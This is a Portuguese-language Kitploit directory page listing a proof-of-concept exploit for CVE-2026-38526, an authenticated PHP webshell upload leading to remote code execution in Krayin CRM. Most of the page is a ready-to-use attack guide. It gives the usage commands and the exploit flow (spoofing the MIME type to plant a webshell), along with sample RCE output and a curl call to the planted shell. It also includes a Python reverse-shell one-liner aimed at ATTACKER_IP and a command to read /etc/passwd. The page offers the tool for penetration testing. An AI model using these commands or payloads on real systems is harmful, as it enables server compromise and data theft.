Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-CVE-2026-38526 — # Exploit automatizado para Krayin CRM ≤ 2.2.x. | Kitploit
Ferramentas/GitHubGitHub/b0nyo/poc-cve-2026-38526
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubb0nyo/poc-cve-2026-38526

PoC-CVE-2026-38526

# Exploit automatizado para Krayin CRM ≤ 2.2.x.

Ver Repositório
7há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-38526 - Upload PHP RCE no Krayin CRM

Exploit automatizado para Krayin CRM ≤ 2.2.x. Este script explora uma vulnerabilidade de upload de arquivo irrestrito no endpoint TinyMCE (/admin/tinymce/upload), contorna a validação do tipo MIME falsificando image/jpeg, faz upload de um webshell PHP e executa comandos arbitrários com privilégios do servidor web.


Detalhes da Vulnerabilidade

PropriedadeValor
ID CVECVE-2026-38526
Software AfetadoKrayin CRM ≤ 2.2.x
Tipo de VulnerabilidadeUpload de Arquivo Irrestrito → Execução Remota de Código
AutenticaçãoNecessária (qualquer conta de admin válida)
EndpointPOST /admin/tinymce/upload

Pré-requisitos

  • Python 3.7+
  • Credenciais de administrador válidas para a instância do Krayin CRM alvo
  • Acesso de rede ao aplicativo alvo
  • Biblioteca requests

Instalação

git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

Uso

python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

Argumentos

FlagDescriçãoExemplo
-iURL alvo (com ou sem http://)http://target.com ou target.com
-uE-mail/nome de usuário do admin[email protected]
-pSenha do adminAdminPassword123!
-cComando a executar (padrão: id)whoami

Exemplos

# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

Fluxo do Exploit

  1. Autenticação: Extrair o token CSRF da página de login e autenticar com as credenciais fornecidas
  2. Validação de Sessão: Extrair um novo token CSRF do painel autenticado
  3. Upload do Webshell: Enviar o payload PHP para /admin/tinymce/upload com tipo MIME falsificado
  4. Execução de Comandos: Executar comandos arbitrários por meio do parâmetro GET do webshell

Exemplo de Saída

[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

Problemas Comuns

Falha na Autenticação: Verifique se as credenciais estão corretas e se a conta existe no alvo.

Falha na Extração do Token CSRF: Certifique-se de que o alvo está executando o Krayin CRM vulnerável e que o endpoint de login está acessível.

Reverse Shell Não Conectando: Certifique-se de que seu listener está em execução (nc -lvnp <PORT>), que as regras de firewall permitem conexões de saída e que o IP/porta no payload estão corretos.


Aviso Legal

Esta ferramenta é fornecida estritamente para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Os usuários são os únicos responsáveis por garantir que possuem autorização adequada antes de testar qualquer sistema alvo. O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.


Referências

  • TREXNEGRO Security Advisory - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - Unrestricted File Upload

Autor

b0nyo - Implementação do PoC

  • GitHub

TREXNEGRO - Descoberta da Vulnerabilidade

  • Security Advisories
Baixar ferramenta